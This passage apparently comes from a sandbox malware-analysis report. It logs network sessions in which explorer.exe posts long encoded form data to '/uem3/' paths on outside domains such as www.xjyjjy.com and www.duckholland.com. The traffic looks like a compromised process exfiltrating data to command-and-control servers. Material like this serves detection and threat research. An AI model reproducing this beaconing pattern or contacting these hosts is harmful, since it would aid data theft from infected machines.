BpE=FeOGRGgzb8SCRJUGT9v-~lp5P5WLiysz9AjDRShp9y0QLuWZ4pM8B6kh(Ww6(TizQc7e70(yIXSPjN6foOhmVi35Peu9SzEg497ONnL4F_ozq7LLZ3eMVUZRcolzTuLou-g7h7Leshrje1AnapkJjB2AHLQLH4oC37y8piG3pw(g4gQV3BgPx9x54g~qvjYL42~f280ZUQnVXlv-9Xr6YO52HX6SupSIa5F_57nIpmgKnnqpJMFikwt7BgREuuqvuQ7kCxE2KcdsGg8RE6TP6YBv4MgZogsN3pFww_hiiQFdU0QsTJHwax4UZHhzgYuJ5oUpvqx_v5kvYpz6GPeWaqM34wClsSyIWe5tox9GIrKFAHkXzwuqKNFC075iZEEnJIfL8AP8OSvod4TTIIXDPDIbmFWg9pPQEM4qPDtDpMQf0aCyFhTlbacrBHbT5XlH8SNu(asMVfcGepZUDIfox_qFXDCqxzi1jLmO1RGB9h4Z5mwXCfrIl1~_TTJ5B3dGbEYmW6TRXIVArRl_4usLJkhA2VB7AxJHmywLMDzzMeLr1Z3snrhGBi6JgHJveJ3d4QofcCelRB6gNlGAmBN-P9lFVACPvsWb~8vJENb4UW18q6S6KL5K4Ha7ubEybT0jKQVW8H0WK8~4c9NGKwwAA8LWwIozTxSGXA9FkT5uLjKccUXHFHallvyj4_sObOTevQ).
Jun 21, 2022 21:09:24.800724983 CEST	11673	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 21 Jun 2022 19:09:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 374 Connection: close Content-Encoding: gzip FAI-W-FLOW: 1656231051 FAI-W-AGENT_AID: 29265868 X-Content-Type-Options: nosniff Update-Time: 1652241799 Src-Update: true P3P: CP=CAO PSA OUR Origin-Agent-Cluster: ?0 X-Permitted-Cross-Domain-Policies: none X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Set-Cookie: _cliid=Z1I2WZRNlmUT5dmE; domain=www.xjyjjy.com; path=/; expires=Wed, 21-Jun-2023 19:09:24 GMT; HttpOnly Service-Lane: 172.16.1.51:6002 Data Raw: 1f 8b 08 00 00 00 00 00 00 00 75 91 cf 4e c2 40 10 c6 ef 3e c5 26 c6 ac 26 b6 5b 50 38 14 8a 07 9f c1 07 28 65 5a 36 6c bb 4d 67 25 e0 8d 83 07 13 48 24 62 e2 9f 03 57 13 13 39 70 90 80 c4 97 a1 94 9b af e0 62 3d 68 a2 73 98 4c be ef 97 cc 37 99 9d 9d 7f ab 2a 78 d4 22 aa 1b 83 43 15 74 14 f3 10 29 69 26 e0 3b 94 b1 a2 89 68 fa 2e c7 2e 9a 9e 0c b7 26 6b 70 54 0c 55 57 00 b2 ba 8b 60 86 3c 32 b5 71 d2 76 8a 56 b1 68 95 0b a5 42 e1 b8 4c 49 02 c2 a1 39 d8 04 50 94 b0 5a b5 c1 db c4 13 2e a2 43 fd 96 21 78 a8 ce da 34 97 bf 48 87 c6 12 b9 e2 32 b2 89 5b 47 29 ce 15 54 c8 36 98 e1 0a 1e 68 d5 83 48 41 a2 35 19 db a4 64 ed 55 88 00 5f 7d 8f 2a 71 23 f4 65 12 da f9 28 5c 05 fb 86 b6 0e c9 b6 1f 54 f4 2e 1e 06 04 13 ef af f3 78 e8 06 c0 f4 7e 38 15 52 5f 16 47 01 65 bf d2 f9 32 52 06 f2 0b b0 0b e5 b8 53 21 9e 14 32 b1 c9 6e 59 97 4e c2 23 30 9a c0 83 a6 0e 74 64 69 80 d6 d2 e5 4d 7a 35 58 cd e6 9b c9 6d 36 7a ca 96 c3 ec f9 fe e3 ad bf 9a 0d d6 a3 c9 ba df cb 16 c3 f4 e5 21 1d 8f d3 eb c1 6a f9 ae 19 ed 6e 26 af 9b de 28 9b 2e 72 3e 7b 9c a5 97 d3 d5 7c 9e 0e ef aa fa 03 ed da cf fe 09 55 9f 42 04 df 01 00 00 Data Ascii: uN@>&&[P8(eZ6lMg%H$bW9pb=hsL7x"Ct)i&;h..&kpTUW`<2qvVhBLI9PZ.C!x4H2[G)T6hHA5dU_}q#e(\T.x~8R_Ge2RS!2nYN#0tdiMz5Xm6z!jn&(.r>{\|UB

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49902	101.36.112.119	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:24.700100899 CEST	11662	OUT	POST /uem3/ HTTP/1.1 Host: www.xjyjjy.com Connection: close Content-Length: 36477 Cache-Control: no-cache Origin: http://www.xjyjjy.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.xjyjjy.com/uem3/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 70 45 3d 46 65 4f 47 52 45 30 66 46 59 69 68 66 35 5a 69 65 76 76 71 31 31 5a 37 4e 4a 69 79 7e 6d 38 73 36 78 7a 70 50 6a 52 2d 38 77 6b 57 50 65 61 30 71 61 4d 30 42 34 38 49 31 44 5a 78 37 7a 6d 77 51 64 53 35 37 30 7a 79 4a 57 71 66 69 73 71 35 70 73 35 6e 57 43 33 46 4d 65 75 65 44 6e 4d 64 34 39 32 74 4e 6e 54 6f 47 4d 38 7a 72 5a 44 4c 62 77 71 54 52 30 5a 54 52 49 31 56 65 4f 47 36 75 36 30 6a 68 36 62 65 73 78 6e 6a 66 57 59 6b 63 75 59 47 75 78 32 59 4d 72 51 6f 4d 59 6b 34 33 37 6d 61 70 69 4b 33 71 43 62 67 33 54 6f 56 6a 6d 38 51 6b 64 78 34 38 67 7e 33 72 6a 55 61 34 32 69 54 32 2d 5a 6b 58 6b 7a 56 58 56 76 39 33 6d 69 48 4f 64 51 32 55 48 50 41 75 70 65 6c 61 49 5a 6e 35 5f 33 67 28 45 34 78 36 31 43 58 4a 4f 70 49 68 51 74 5f 4a 41 51 61 75 75 71 6c 75 51 37 4b 43 77 30 32 4b 64 56 73 47 42 38 52 43 71 54 49 68 34 42 75 35 4d 67 57 73 67 6f 39 33 70 64 73 77 2d 70 69 69 69 35 64 4f 46 38 73 57 73 7a 7a 53 78 34 61 49 33 68 6d 75 34 75 57 35 6f 55 78 76 72 78 56 73 4b 41 76 61 39 66 36 4c 4e 6d 57 4a 71 4d 33 68 77 43 72 6d 79 75 59 57 61 55 6b 6f 77 4d 39 49 59 6d 46 41 53 77 58 7a 53 57 71 47 64 46 43 39 62 35 68 49 55 45 39 4a 49 75 30 38 46 7a 56 4f 68 37 6f 63 5a 44 54 4a 75 44 44 4a 7a 4a 51 70 6c 57 41 33 35 7a 37 45 4d 73 69 50 42 68 35 70 36 63 66 31 34 71 79 56 43 37 6b 56 36 63 76 43 48 61 57 6b 48 34 52 38 53 46 49 28 59 6f 6d 53 73 4d 47 66 39 74 55 54 65 4c 76 76 76 71 44 55 44 43 32 71 44 75 61 6a 4c 7e 61 31 51 36 42 39 68 30 5a 35 58 41 58 48 59 28 4c 6c 6c 7e 34 53 54 49 36 42 33 42 78 62 45 30 6d 57 37 32 6d 43 6f 46 41 72 77 31 5f 78 34 78 64 47 30 68 4f 31 56 42 61 54 68 4a 55 6d 79 77 70 4d 47 50 6a 4e 73 7a 72 30 4b 28 73 6b 50 31 47 50 43 36 49 69 48 49 30 49 4a 72 68 34 51 38 6c 63 44 69 6c 53 7a 75 67 58 45 6d 41 67 68 4e 39 45 74 6c 4d 4e 77 43 45 35 63 61 42 7e 39 4b 71 45 50 54 4f 55 6a 46 38 71 39 57 36 4e 6f 52 4e 34 58 61 30 72 62 45 74 62 54 31 53 4b 51 56 73 38 44 6f 38 4b 5f 7e 34 65 4e 4e 47 65 42 77 66 61 38 4c 54 33 49 6f 44 46 42 53 64 58 41 39 52 6b 54 78 41 4d 55 7a 73 63 33 71 51 42 6b 62 6f 73 4e 7e 38 6a 75 35 4d 51 5f 4b 5a 7e 6e 71 31 30 49 55 77 44 7a 48 70 45 59 34 68 65 32 67 33 52 78 66 48 70 67 56 74 46 6d 30 41 77 53 38 4d 30 54 6d 42 54 4c 71 79 4b 68 65 50 39 57 73 67 56 4d 58 64 6c 62 62 71 41 69 56 79 4c 31 45 62 4a 75 58 68 6a 59 7a 49 70 5a 79 4f 41 53 41 79 4f 53 59 31 73 58 46 63 6c 62 53 4d 61 42 77 6b 68 63 41 55 58 76 6a 38 32 4c 47 76 49 39 76 30 58 30 66 7a 58 31 6c 69 64 4e 54 2d 67 49 5a 74 76 32 49 47 42 67 59 4d 4d 78 4e 47 66 6d 63 64 63 69 39 61 6c 31 66 31 53 5a 39 77 34 31 42 35 77 79 4d 76 54 36 55 30 79 79 66 73 49 46 79 48 4e 74 42 6c 75 75 4e 44 66 4e 42 4d 37 39 4c 5a 6c 4e 51 68 57 4f 51 34 66 66 6c 72 28 37 4d 4a 50 64 73 5a 75 4b 7e 4b 5a 67 43 49 4e 79 68 69 66 70 63 77 30 4c 76 7a 52 67 4d 57 54 69 70 51 61 39 34 49 42 50 4f 75 67 65 75 64 35 51 48 47 43 39 77 42 53 34 69 63 76 4b 51 73 75 65 53 51 44 4f 50 6d 77 51 32 6e 4d 53 39 67 43 5a 4d 39 4a 66 56 37 7a 7a 6e 5a 69 61 49 4f 6d 78 78 55 53 62 79 34 52 56 49 4b 67 68 43 48 46 44 72 65 30 6d 45 4e 57 6d 5a 4b 71 54 64 57 33 30 33 6c 4f 4c 68 79 45 5f 62 5a 53 65 38 66 4a 41 77 75 64 45 47 36 30 53 39 68 47 78 51 49 42 31 44 56 7e 70 5a 55 4a 4d 51 55 74 55 76 6d 58 46 6d 75 34 65 46 78 32 62 41 59 46 48 7e 45 58 78 37 38 65 57 6e 74 6b 39 75 37 33 53 79 44 54 59 64 7a 39 36 74 51 41 36 76 54 51 68 30 36 36 54 35 74 48 6b 4b 31 45 35 44 48 63 31 4a 75 44 67 78 68 4e 76 76 78 69 6e 49 67 76 5a 4b 2d 66 48 72 72 4b 78 65 31 43 52 4a 34 69 31 47 51 57 72 76 75 58 69 4d 4d 4e 64 47 69 4f 70 32 4b 32 6c 61 6e 50 38 48 30 76 6f 77 33 50 55 6a 35 30 6b 65 62 37 70 35 4d 6f 36 7e 41 48 6d 68 6c 78 56 6e 2d 46 5f 31 71 4d 44 6a 79 63 38 59 44 7e 7a 74 6e 69 35 44 65 33 38 76 66 5a 4f 68 69 49 64 58 6a 49 57 6e 63 6d 36 61 6f 61 56 30 43 42 4e 76 68 52 68 69 59 37 5f 34 72 61 72 4d 79 6d 77 50 46 45 72 30 69 57 39 6a 4b 28 6c 41 77 5a 74 74 6b 4d 6c 6b 75 63 5f 68 53 61 57 76 2d 59 41 57 62 45 48 5a 50 4a 4c 47 69 76 6a 62 41 62 72 42 42 59 58 49 76 70 5a 75 62 5a 70 42 Data Ascii: BpE=FeOGRE0fFYihf5Zievvq11Z7NJiy~m8s6xzpPjR-8wkWPea0qaM0B48I1DZx7zmwQdS570zyJWqfisq5ps5nWC3FMeueDnMd492tNnToGM8zrZDLbwqTR0ZTRI1VeOG6u60jh6besxnjfWYkcuYGux2YMrQoMYk437mapiK3qCbg3ToVjm8Qkdx48g~3rjUa42iT2-ZkXkzVXVv93miHOdQ2UHPAupelaIZn5_3g(E4x61CXJOpIhQt_JAQauuqluQ7KCw02KdVsGB8RCqTIh4Bu5MgWsgo93pdsw-piii5dOF8sWszzSx4aI3hmu4uW5oUxvrxVsKAva9f6LNmWJqM3hwCrmyuYWaUkowM9IYmFASwXzSWqGdFC9b5hIUE9JIu08FzVOh7ocZDTJuDDJzJQplWA35z7EMsiPBh5p6cf14qyVC7kV6cvCHaWkH4R8SFI(YomSsMGf9tUTeLvvvqDUDC2qDuajL~a1Q6B9h0Z5XAXHY(Lll~4STI6B3BxbE0mW72mCoFArw1_x4xdG0hO1VBaThJUmywpMGPjNszr0K(skP1GPC6IiHI0IJrh4Q8lcDilSzugXEmAghN9EtlMNwCE5caB~9KqEPTOUjF8q9W6NoRN4Xa0rbEtbT1SKQVs8Do8K_~4eNNGeBwfa8LT3IoDFBSdXA9RkTxAMUzsc3qQBkbosN~8ju5MQ_KZ~nq10IUwDzHpEY4he2g3RxfHpgVtFm0AwS8M0TmBTLqyKheP9WsgVMXdlbbqAiVyL1EbJuXhjYzIpZyOASAyOSY1sXFclbSMaBwkhcAUXvj82LGvI9v0X0fzX1lidNT-gIZtv2IGBgYMMxNGfmcdci9al1f1SZ9w41B5wyMvT6U0yyfsIFyHNtBluuNDfNBM79LZlNQhWOQ4fflr(7MJPdsZuK~KZgCINyhifpcw0LvzRgMWTipQa94IBPOugeud5QHGC9wBS4icvKQsueSQDOPmwQ2nMS9gCZM9JfV7zznZiaIOmxxUSby4RVIKghCHFDre0mENWmZKqTdW303lOLhyE_bZSe8fJAwudEG60S9hGxQIB1DV~pZUJMQUtUvmXFmu4eFx2bAYFH~EXx78eWntk9u73SyDTYdz96tQA6vTQh066T5tHkK1E5DHc1JuDgxhNvvxinIgvZK-fHrrKxe1CRJ4i1GQWrvuXiMMNdGiOp2K2lanP8H0vow3PUj50keb7p5Mo6~AHmhlxVn-F_1qMDjyc8YD~ztni5De38vfZOhiIdXjIWncm6aoaV0CBNvhRhiY7_4rarMymwPFEr0iW9jK(lAwZttkMlkuc_hSaWv-YAWbEHZPJLGivjbAbrBBYXIvpZubZpBxo0FMz0936aYiVPVVQmsWpi2yyhBtyIniV0(du_mpt_q-ZwDVHgZHvATGcbd9zNLskjpEuc7sq1ho3l3UHUPbMf3WM-WE90mChjMalcQXl47_vy51MZ10EVGNcRgr4MtxQ7JPse6tCGhgmOy9Hw~uF4e_mOrYt2leGhXIE6NtXq~EcGgiagcTs2o595KdC8ubvLDrs_mNR5NWcMWCGEubOyoo8_IROYcQDGjQhm9Z4fUYKK4pJysP6eDXzP~SH2D4tzvRbLlPRQxVisrGqU1NrZCsw_bp6xEXmNSS(RuhwvHNoR6gxbYMU_CLxIfI9Iw5d_tIz8Yt~IMeDYEIaAPgRAAO2EF-K6RNvRX99NhVSeULi4zyGTAKkA9B(w2GbiZR2fs2Cy5PVko2hObWT_dj~REcitN9ybtJXC8zZ2IrWwk-usG4YqYG6nxYctdbVRrZNOss69IS7hn8jSafb5(qlbVfiv4EtOzSwyHPGZMW0nVbuPyDQljJ7mNkA0TymmCziKPdQkc8uFhDFtqaw_IeB4To1dOUbsF9AkBVJ8BcvoN-NDCXhe6oF9gLIwVdimRgllEw0LA0g86xSQWDPXQSu9weVW4ciPWb8sLl7oJWezYn~LMw(D7bST7zV1KRGDpKiz(HcYbFJVZIspm_varHeG7GoYVG~hDaOQMJtXDEiecryQz1WTuZEYWsoLA8YJkfBdncboAk5siV2u2nym~UYejhulUWjrVD45WCv5uyTPPYglMfnskN8r0xVLrAa9cOLTfhUclC5DieoDnPUWps7I0DDvu8HRUbSko9xhl4flTSnHL5AAFVt7W8WaCulo2FLrYBuaOvHLngxEXuEW4MX2ZxK2PAM1NfBIfnCBVUEMb9mXMVOW6TShSMH6SgSJKtzOglX6qdyQs80k5fOZ4wCiYQyCF1~54YwsVhQelVCdNIr-EbmZ~M4MKULN8bOsPSNAWGVudw61qsxeOEsVEncNYJ3_42F7cGUt4n5I2-OiIxPKvisz~Ub2fd8jAXzYiFwRRGeDqVyzx1KyszFZzws5aPgjzlmLZ5(St30DVLM3xQtH1pATBs4FxnUiL0Pw5dg1DWs91RHMR2SpQztjwhjsMzVPkZI0NmqPdGM9Voaw5pwX6NEleAdZ~FhfbdV3zFN7lQoHbyTwSgUN3WikYRYZ1xkD7dmCuld7dJ2oJv0rUBeWjkUZHrNopAVMdKnLkbvB2xI-AYOyrjokv6G2zpq4VuelNIximiHY2IcRXrME~ZJz5Sih01QAh2dFQgTmWSHbq0tk8f80gFbmjp89Y90UATfNgcdDWLeW(9tXITVEG08MkRSUukghvYDBOLEN53cIoUILiQNby7B4j5p-GjumcR6s5PWgQ3og6nN0kLVgvF~-(XzEAG0P7VdNlRsvnoHaQFq3H2jWDtiEeYcwpd(6iqwK9I8qEnR_yLbXVK~qkpsH~xh55ufxK8nSkJqUyT9kSko7E6T6JPnGSfRTrShPNEA8QA7yvW2b8ca9m7yAFynTNaKP5PEtqIDHdtfs6Udb2_EOxn2kkfjz2niA3r4PhE14~Ec26D9P2cDV8-mgGaFu1XA10BGNR0hbW1qXeBxBZX6vWnEIhqCEtC8qf044sw~chW9X0ckVdchZ~w27SYF9lTgYpxBLIzP3dgpJveR1(5ZWj2X3Due69b1Fj2rm2qaq8W3djOlStxXPdrgwN9mMmIRdYJQqgtm3ENtY(cMLnTg9ASfy8QfaAoULFYelBKguHxhF17IiSbIjkkg26kuEHoYJvN65xHSWAw3X7zWpU0leiFBuK_OGnHSCYAjS73NS(uwUu_zQ(r4VJ8aZ09JsW9zicSQibEmQHuEfa_ym34VF~bOpCGYVUtRkgDk0aihpDlyd0Znpp-Lw8St3XhLxf4msAIQZXC4Caigdu9TAE0M50t2vTyUOekZTgbQJoMQxISh1o1PD7sqTrFzy3zWAHZozI_Gvnu2GmcY0I2wwo_gdHOmCm-ZpCSTArSBTl4lna0SonEagUjTd3AXQbrn41Ft7utppY9B0mPy8zPkto1cgn9OUQdZOGlB60y(fdJ8rRtpa8gZIuLZ7XOOLAdQENJTQjBSMSqqlwVDcPVjKhpeauYVNWyjm0RRJeBnsgXCr8QBocvVLL7SNEHMJzvZT7DVcF4qLDSvn1GtGDl3hwyMVOaJQVVBTkEGfteLd3hNeeSyyXvKA3koS2oydBerAHYzUwEJqU7JAJYUGvW3KccgDqADOYtVYdxxxFlOHFSg4XLLsYmVTOBprtaStkpeoLqlPXtYbJLmen4nJF7OnCi2Dl209oj3X0gwEkWJeW6HxFRpxvN06iZptSkVzwJOfp2t4yJzI4rDPyV5ygB21kyB5gSWHizC0J2LplIbVnmX38DwjJVUxR6Etj-lUQhkkjfNdj3NU3Yq4kQbGC3mjNTHGIhSdsqzgflNLr0mv2djmBsF4k_V63wUqBREW8cSKhsdZFj4t7X~-iLurX5YJQnXJPQhUzgIh~Q2dscQoaXjLhoAiDytdET3bUSHu(qI2mR8c68DrrJq-ElG5M5q0JZtEJLvZZ2vpM0HdSU(loOQDLj~KSHTaeBf68dggloz65O85SZiAc-ErKk6w0VRjQTHuztoKQa3MdD9ow7Q0t8aDtos7lBvq3LzHLhooGiaepXQ3ZaE_Mt4831oZ5IFqBSK1PJafIVYqpZNMvyuItko8RGMAZCQB
Jun 21, 2022 21:09:24.909621954 CEST	11723	OUT	Data Raw: 42 78 51 54 44 4f 49 61 70 4f 67 38 50 4a 74 44 37 32 56 2d 4d 68 28 74 79 67 7a 6b 44 52 51 55 73 39 4a 45 47 5a 77 76 52 64 39 31 55 51 55 39 6f 6d 47 30 38 47 38 45 7e 6e 74 31 6c 67 53 37 4c 67 62 39 64 6e 6d 50 37 75 34 41 61 64 49 57 57 57 Data Ascii: BxQTDOIapOg8PJtD72V-Mh(tygzkDRQUs9JEGZwvRd91UQU9omG08G8E~nt1lgS7Lgb9dnmP7u4AadIWWWy69vRJBUe_GXbZmTtD0KqAr2GGisOv6AHcMIpApxDY9do103xKGzC6YQc9hFeYf-2DF1HE0DaRPjnbpCh8z9~ZgJQ54t4eOgw7V-fnmY81JsoTq8rkZy4w2tgOg_hzycRp3qwVe_8XNucGhJcgzNFFTvhTjB59Nmm
Jun 21, 2022 21:09:24.909712076 CEST	11733	OUT	Data Raw: 4d 79 4d 57 72 46 72 7a 61 36 50 75 66 70 5a 4c 4f 65 47 41 53 46 4a 4a 63 49 66 76 59 56 47 30 28 4b 72 33 50 36 56 68 50 65 32 43 46 5f 32 34 37 38 4d 79 61 46 66 52 5a 6e 52 71 78 68 41 58 67 51 34 6a 42 38 6d 6a 71 37 71 7a 75 61 30 32 78 61 Data Ascii: MyMWrFrza6PufpZLOeGASFJJcIfvYVG0(Kr3P6VhPe2CF_2478MyaFfRZnRqxhAXgQ4jB8mjq7qzua02xaxRnhpgGgsA8cnhZqAgtASECWRro0nW1mSI7UY-dR8YIsEC~Jo8~Yb26FyQPOpBGU68W8K1~_cW~H~8Xiftxe8hQwEbumK5lTUrPPas8sw_l0GPJXQxQLcBbrDcaevbI-nXceaTPLd6cqLdsNdFww(QC8RIe90LbwV
Jun 21, 2022 21:09:25.190330029 CEST	11784	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 21 Jun 2022 19:09:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 374 Connection: close Content-Encoding: gzip FAI-W-FLOW: 1656258051 FAI-W-AGENT_AID: 29265868 X-Content-Type-Options: nosniff Update-Time: 1652241799 Src-Update: true P3P: CP=CAO PSA OUR Origin-Agent-Cluster: ?0 X-Permitted-Cross-Domain-Policies: none X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Set-Cookie: _cliid=oJXw6CX8_gl-voLf; domain=www.xjyjjy.com; path=/; expires=Wed, 21-Jun-2023 19:09:25 GMT; HttpOnly Service-Lane: 172.16.1.51:6002 Data Raw: 1f 8b 08 00 00 00 00 00 00 00 75 91 cf 4e c2 40 10 c6 ef 3e c5 26 c6 ac 26 b6 5b 50 38 14 8a 07 9f c1 07 28 65 5a 36 6c bb 4d 67 25 e0 8d 83 07 13 48 24 62 e2 9f 03 57 13 13 39 70 90 80 c4 97 a1 94 9b af e0 62 3d 68 a2 73 98 4c be ef 97 cc 37 99 9d 9d 7f ab 2a 78 d4 22 aa 1b 83 43 15 74 14 f3 10 29 69 26 e0 3b 94 b1 a2 89 68 fa 2e c7 2e 9a 9e 0c b7 26 6b 70 54 0c 55 57 00 b2 ba 8b 60 86 3c 32 b5 71 d2 76 8a 56 b1 68 95 0b a5 42 e1 b8 4c 49 02 c2 a1 39 d8 04 50 94 b0 5a b5 c1 db c4 13 2e a2 43 fd 96 21 78 a8 ce da 34 97 bf 48 87 c6 12 b9 e2 32 b2 89 5b 47 29 ce 15 54 c8 36 98 e1 0a 1e 68 d5 83 48 41 a2 35 19 db a4 64 ed 55 88 00 5f 7d 8f 2a 71 23 f4 65 12 da f9 28 5c 05 fb 86 b6 0e c9 b6 1f 54 f4 2e 1e 06 04 13 ef af f3 78 e8 06 c0 f4 7e 38 15 52 5f 16 47 01 65 bf d2 f9 32 52 06 f2 0b b0 0b e5 b8 53 21 9e 14 32 b1 c9 6e 59 97 4e c2 23 30 9a c0 83 a6 0e 74 64 69 80 d6 d2 e5 4d 7a 35 58 cd e6 9b c9 6d 36 7a ca 96 c3 ec f9 fe e3 ad bf 9a 0d d6 a3 c9 ba df cb 16 c3 f4 e5 21 1d 8f d3 eb c1 6a f9 ae 19 ed 6e 26 af 9b de 28 9b 2e 72 3e 7b 9c a5 97 d3 d5 7c 9e 0e ef aa fa 03 ed da cf fe 09 55 9f 42 04 df 01 00 00 Data Ascii: uN@>&&[P8(eZ6lMg%H$bW9pb=hsL7x"Ct)i&;h..&kpTUW`<2qvVhBLI9PZ.C!x4H2[G)T6hHA5dU_}q#e(\T.x~8R_Ge2RS!2nYN#0tdiMz5Xm6z!jn&(.r>{\|UB

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49903	101.36.112.119	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:24.982079029 CEST	11734	OUT	GET /uem3/?BpE=Kc68PjQ5YLKhI5YJGbmTtSVcH4y3rSoSs1SAKTtyyAoVNP+YqbFEGdxEoFZf0m2HIavw&SH=IDKTKDM HTTP/1.1 Host: www.xjyjjy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 21, 2022 21:09:25.263449907 CEST	11818	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 21 Jun 2022 19:09:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 32 33 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 09 3c 74 69 74 6c 65 3e e5 8f af e7 96 91 e8 af b7 e6 b1 82 e6 8b a6 e6 88 aa e9 80 9a e7 9f a5 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 66 75 6e 63 74 69 6f 6e 20 46 6f 72 62 69 64 46 72 65 73 68 50 61 67 65 28 29 20 7b 0d 0a 09 20 20 20 20 69 66 20 28 28 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2e 63 74 72 6c 4b 65 79 20 26 26 20 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2e 6b 65 79 43 6f 64 65 20 3d 3d 20 31 31 36 29 20 7c 7c 20 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2e 6b 65 79 43 6f 64 65 20 3d 3d 20 31 31 36 29 20 7b 0d 0a 09 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2e 6b 65 79 43 6f 64 65 20 3d 20 30 3b 0d 0a 09 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2e 72 65 74 75 72 6e 56 61 6c 75 65 20 3d 20 66 61 6c 73 65 3b 0d 0a 09 20 20 20 20 7d 0d 0a 09 7d 0d 0a 09 64 6f 63 75 6d 65 6e 74 2e 6f 6e 6b 65 79 64 6f 77 6e 20 3d 20 46 6f 72 62 69 64 46 72 65 73 68 50 61 67 65 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 09 e6 8a b1 e6 ad 89 ef bc 8c e6 82 a8 e7 9a 84 e8 ae bf e9 97 ae e7 96 91 e4 bc bc e6 94 bb e5 87 bb e8 af b7 e6 b1 82 ef bc 8c e5 b7 b2 e8 a2 ab e7 b3 bb e7 bb 9f e8 87 aa e5 8a a8 e6 8b a6 e6 88 aa ef bc 8c e5 a6 82 e4 b8 ba e8 af af e5 b0 81 e8 af b7 e8 81 94 e7 b3 bb e5 ae a2 e6 9c 8d e3 80 82 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 23d<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title></title><script type="text/javascript">function ForbidFreshPage() { if ((window.event.ctrlKey && window.event.keyCode == 116) \|\| window.event.keyCode == 116) { window.event.keyCode = 0; window.event.returnValue = false; }}document.onkeydown = ForbidFreshPage;</script></head><body></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49919	154.94.246.226	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:30.955770016 CEST	12210	OUT	POST /uem3/ HTTP/1.1 Host: www.duckholland.com Connection: close Content-Length: 713 Cache-Control: no-cache Origin: http://www.duckholland.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.duckholland.com/uem3/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 70 45 3d 33 76 43 6a 70 42 30 47 68 56 54 79 38 53 42 48 53 33 56 4d 6a 66 4d 55 6d 31 55 47 41 78 46 32 4b 66 72 44 51 5f 64 51 49 6a 62 4d 5a 51 43 6f 4a 62 39 49 32 58 79 5f 65 48 77 70 61 69 63 4a 7a 69 48 2d 43 6c 79 63 4c 46 32 61 42 4f 68 6f 34 45 4a 79 57 44 64 39 67 5a 72 41 70 53 37 54 57 37 69 34 30 4f 6a 68 7a 54 30 2d 4e 65 34 4a 51 33 79 4d 36 36 51 70 70 58 28 44 55 59 70 4f 49 56 47 43 6d 78 69 76 52 33 6e 69 75 6f 6c 78 39 64 54 41 4f 6b 6b 79 71 42 47 38 34 70 45 65 56 4d 67 50 5a 68 4d 65 64 76 75 53 42 52 32 32 42 4d 61 30 70 5f 6a 71 65 72 66 79 76 5f 6b 70 52 73 6a 7a 61 76 4b 6a 62 75 66 69 6c 73 43 4d 6d 67 31 58 77 6d 62 4b 47 36 43 6e 76 46 42 79 63 70 61 6c 6e 37 4d 50 7e 48 4c 37 33 6c 4e 55 46 5f 6d 7a 77 69 6b 4c 74 63 68 57 7e 56 75 51 77 42 7e 58 28 72 6a 46 35 6c 4a 6c 6e 6e 7a 57 62 4f 64 51 39 34 6e 2d 30 69 64 68 76 6a 6b 58 39 7a 68 30 28 44 77 76 76 51 31 53 41 72 39 2d 66 67 7a 53 45 34 77 32 31 36 79 71 50 53 6e 68 56 59 49 7a 64 4f 7a 31 5a 69 43 39 64 6a 57 44 4e 69 73 33 47 54 38 42 6b 34 55 58 28 42 50 4c 54 78 36 63 65 6b 69 5f 6a 56 6a 48 61 4b 76 35 48 66 75 43 66 49 57 71 50 6d 72 32 63 73 32 63 69 49 6f 42 71 64 61 39 39 66 6d 44 77 6a 31 33 79 71 6d 6e 74 46 74 6d 45 70 6e 77 6c 4a 48 6b 59 34 55 75 6b 75 6a 39 73 45 50 6f 50 48 62 31 4a 45 43 54 33 5f 38 4a 54 72 62 4d 74 46 4e 72 6a 71 4b 30 5a 38 6a 51 59 45 67 52 65 53 59 6e 68 66 33 6b 62 4c 78 44 42 4f 73 58 30 31 71 61 